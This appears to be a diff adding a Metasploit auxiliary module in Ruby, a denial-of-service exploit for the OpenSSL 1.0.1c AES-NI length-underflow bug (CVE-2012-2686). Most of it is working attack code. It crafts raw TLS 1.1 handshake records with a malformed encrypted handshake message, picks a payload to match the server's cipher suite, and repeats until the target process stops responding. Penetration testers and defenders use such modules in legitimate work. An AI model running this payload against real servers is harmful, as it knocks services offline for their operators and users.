|
| 1 | +# auxilary/dos/ssl/openssl_aesni |
| 2 | +require 'msf/core' |
| 3 | + |
| 4 | +class Metasploit4 < Msf::Auxiliary |
| 5 | + include Msf::Exploit::Remote::Tcp |
| 6 | + include Msf::Auxiliary::Dos |
| 7 | + |
| 8 | + def initialize(info = {}) |
| 9 | + super(update_info(info, |
| 10 | + 'Name' => 'OpenSSL TLS 1.1 and 1.2 AES-NI DoS', |
| 11 | + 'Description' => %q{ |
| 12 | + The AES-NI implementation of OpenSSL 1.0.1c does not |
| 13 | + properly compute the length of an encrypte message when used |
| 14 | + with a TLS version 1.1 or above. This leads to an integer |
| 15 | + underflow which can cause a DoS. |
| 16 | + }, |
| 17 | + 'Author' => [ |
| 18 | + 'Wolfgang Ettlinger <wolfgang.ettlinger[at]gmail.com>' |
| 19 | + ], |
| 20 | + 'License' => BSD_LICENSE, |
| 21 | + 'References' => |
| 22 | + [ |
| 23 | + [ 'CVE', '2012-2686'], |
| 24 | + [ 'URL', 'https://www.openssl.org/news/secadv_20130205.txt'] |
| 25 | + ], |
| 26 | + 'DisclosureDate' => 'Feb 05 2013')) |
| 27 | + |
| 28 | + register_options( |
| 29 | + [ |
| 30 | + Opt::RPORT(443), |
| 31 | + OptInt.new('MAX_TRIES', [true, "Maximum number of tries", 300]) |
| 32 | + ], self.class) |
| 33 | + end |
| 34 | + |
| 35 | + def run |
| 36 | + # Client Hello |
| 37 | + p1 = "\x16" # Content Type: Handshake |
| 38 | + p1 << "\x03\x01" # Version: TLS 1.0 |
| 39 | + p1 << "\x00\x7e" # Length: 126 |
| 40 | + p1 << "\x01" # Handshake Type: Client Hello |
| 41 | + p1 << "\x00\x00\x7a" # Length: 122 |
| 42 | + p1 << "\x03\x02" # Version: TLS 1.1 |
| 43 | + p1 << ("A" * 32) # Random |
| 44 | + p1 << "\x00" # Session ID Length: 0 |
| 45 | + p1 << "\x00\x08" # Cypher Suites Length: 6 |
| 46 | + p1 << "\xc0\x13" # - ECDHE-RSA-AES128-SHA |
| 47 | + p1 << "\x00\x39" # - DHE-RSA-AES256-SHA |
| 48 | + p1 << "\x00\x35" # - AES256-SHA |
| 49 | + p1 << "\x00\xff" # - EMPTY_RENEGOTIATION_INFO_SCSV |
| 50 | + p1 << "\x01" # Compression Methods Length: 1 |
| 51 | + p1 << "\x00" # - NULL-Compression |
| 52 | + p1 << "\x00\x49" # Extensions Length: 73 |
| 53 | + p1 << "\x00\x0b" # - Extension: ec_point_formats |
| 54 | + p1 << "\x00\x04" # Length: 4 |
| 55 | + p1 << "\x03" # EC Points Format Length: 3 |
| 56 | + p1 << "\x00" # - uncompressed |
| 57 | + p1 << "\x01" # - ansiX962_compressed_prime |
| 58 | + p1 << "\x02" # - ansiX962_compressed_char2 |
| 59 | + p1 << "\x00\x0a" # - Extension: elliptic_curves |
| 60 | + p1 << "\x00\x34" # Length: 52 |
| 61 | + p1 << "\x00\x32" # Elliptic Curves Length: 50 |
| 62 | + # 25 Elliptic curves: |
| 63 | + p1 << "\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a" |
| 64 | + p1 << "\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04" |
| 65 | + p1 << "\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10" |
| 66 | + p1 << "\x00\x11" |
| 67 | + |
| 68 | + p1 << "\x00\x23" # - Extension: SessionTicket TLS |
| 69 | + p1 << "\x00\x00" # Length: 0 |
| 70 | + p1 << "\x00\x0f" # - Extension: Heartbeat |
| 71 | + p1 << "\x00\x01" # Length: 1 |
| 72 | + p1 << "\x01" # Peer allowed to send requests |
| 73 | + |
| 74 | + |
| 75 | + # Change Cipher Spec Message |
| 76 | + p2_cssm = "\x14" # Content Type: Change Cipher Spec |
| 77 | + p2_cssm << "\x03\x02" # Version: TLS 1.1 |
| 78 | + p2_cssm << "\x00\x01" # Length: 1 |
| 79 | + p2_cssm << "\x01" # Change Cipher Spec Message |
| 80 | + |
| 81 | + |
| 82 | + # Encrypted Handshake Message |
| 83 | + p2_ehm = "\x16" # Content Type: Handshake |
| 84 | + p2_ehm << "\x03\x02" # Version: TLS 1.1 |
| 85 | + p2_ehm << "\x00\x40" # Length: 64 |
| 86 | + p2_ehm << ("A" * 64) # Encrypted Message |
| 87 | + |
| 88 | + |
| 89 | + # Client Key Exchange, Change Cipher Spec, Encrypted Handshake |
| 90 | + # AES256-SHA |
| 91 | + p2_aes_sha = "\x16" # Content Type: Handshake |
| 92 | + p2_aes_sha << "\x03\x02" # Version: TLS 1.1 |
| 93 | + p2_aes_sha << "\x01\x06" # Length: 262 |
| 94 | + p2_aes_sha << "\x10" # Handshake Type: Client Key Exchange |
| 95 | + p2_aes_sha << "\x00\x01\x02" # Length: 258 |
| 96 | + p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256 |
| 97 | + p2_aes_sha << ("\x00" * 256) # Encrypted PresMaster (irrelevant) |
| 98 | + p2_aes_sha << p2_cssm # Change Cipher Spec Message |
| 99 | + p2_aes_sha << p2_ehm # Encrypted Handshake Message |
| 100 | + |
| 101 | + |
| 102 | + # DHE-RSA-AES256-SHA |
| 103 | + p2_dhe = "\x16" # Content Type: Handshake |
| 104 | + p2_dhe << "\x03\x02" # Version: TLS 1.1 |
| 105 | + p2_dhe << "\x00\x46" # Length: 70 |
| 106 | + p2_dhe << "\x10" # Handshake Type: Client Key Exchange |
| 107 | + p2_dhe << "\x00\x00\x42" # Length: 66 |
| 108 | + p2_dhe << "\x00\x40" # DH Pubkey Length: 64 |
| 109 | + p2_dhe << ("A" * 64) # DH Pubkey |
| 110 | + p2_dhe << p2_cssm # Change Cipher Spec Message |
| 111 | + p2_dhe << p2_ehm # Encrypted Handshake Message |
| 112 | + |
| 113 | + |
| 114 | + # ECDHE-RSA-AES128-SHA |
| 115 | + p2_ecdhe = "\x16" # Content Type: Handshake |
| 116 | + p2_ecdhe << "\x03\x02" # Version: TLS 1.1 |
| 117 | + p2_ecdhe << "\x00\x46" # Length: 70 |
| 118 | + p2_ecdhe << "\x10" # Handshake Type: Client Key Exchange |
| 119 | + p2_ecdhe << "\x00\x00\x42" # Length: 66 |
| 120 | + p2_ecdhe << "\x41" # EC DH Pubkey Length: 65 |
| 121 | + # EC DH Pubkey: |
| 122 | + p2_ecdhe << "\x04\x2f\x22\xf4\x06\x3f\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8" |
| 123 | + p2_ecdhe << "\x03\xe5\xaa\x36\xeb\x0f\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69" |
| 124 | + p2_ecdhe << "\x5b\x38\x95\x58\xb6\x0d\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6" |
| 125 | + p2_ecdhe << "\xb2\xe6\x8b\x2a\xd9\x03\xb4\x85\x46\xd9\x1c\x5f\xd1\xf7\x7b\x73" |
| 126 | + p2_ecdhe << "\x40" |
| 127 | + p2_ecdhe << p2_cssm # Change Cipher Spec Message |
| 128 | + p2_ecdhe << p2_ehm # Encrypted Handshake Message |
| 129 | + |
| 130 | + |
| 131 | + maxtries = datastore['MAX_TRIES'] |
| 132 | + |
| 133 | + success = false |
| 134 | + |
| 135 | + for i in 0..maxtries |
| 136 | + print_status("Try \##{i}") |
| 137 | + |
| 138 | + connect |
| 139 | + |
| 140 | + sock.put(p1) |
| 141 | + resp = sock.recv(4096) |
| 142 | + |
| 143 | + cs = get_cipher_suite(resp) |
| 144 | + |
| 145 | + if cs == 0xc013 # ECDHE-RSA-AES128-SHA |
| 146 | + p2 = p2_ecdhe |
| 147 | + elsif cs == 0x0039 # DHE-RSA-AES256-SHA |
| 148 | + p2 = p2_dhe |
| 149 | + elsif cs == 0x0035 # AES256-SHA |
| 150 | + p2 = p2_aes_sha |
| 151 | + else |
| 152 | + print_error("No common ciphers!") |
| 153 | + return |
| 154 | + end |
| 155 | + |
| 156 | + sock.put(p2) |
| 157 | + |
| 158 | + alert = nil |
| 159 | + |
| 160 | + begin |
| 161 | + alert = sock.get_once(-1, 2) |
| 162 | + rescue EOFError |
| 163 | + print_status("DoS successful. process on #{rhost} did not respond.") |
| 164 | + success = true |
| 165 | + break |
| 166 | + end |
| 167 | + |
| 168 | + disconnect |
| 169 | + |
| 170 | + end |
| 171 | + |
| 172 | + if success == false |
| 173 | + print_status("DoS unsuccessful.") |
| 174 | + end |
| 175 | + end |
| 176 | + |
| 177 | + def get_cipher_suite(resp) |
| 178 | + offset = 0 |
| 179 | + |
| 180 | + while offset < resp.length |
| 181 | + type = (resp[offset, 1]).unpack("C")[0] |
| 182 | + |
| 183 | + if not type == 22 # Handshake |
| 184 | + return nil |
| 185 | + end |
| 186 | + |
| 187 | + len = (resp[offset+3, 2]).unpack("n")[0] |
| 188 | + hstype = (resp[offset+5, 1]).unpack("C")[0] |
| 189 | + |
| 190 | + if hstype == 2 # Server Hello |
| 191 | + return (resp[offset+44, 2]).unpack("n")[0] |
| 192 | + end |
| 193 | + |
| 194 | + offset += len |
| 195 | + end |
| 196 | + |
| 197 | + end |
| 198 | +end |
| 199 | + |
0 commit comments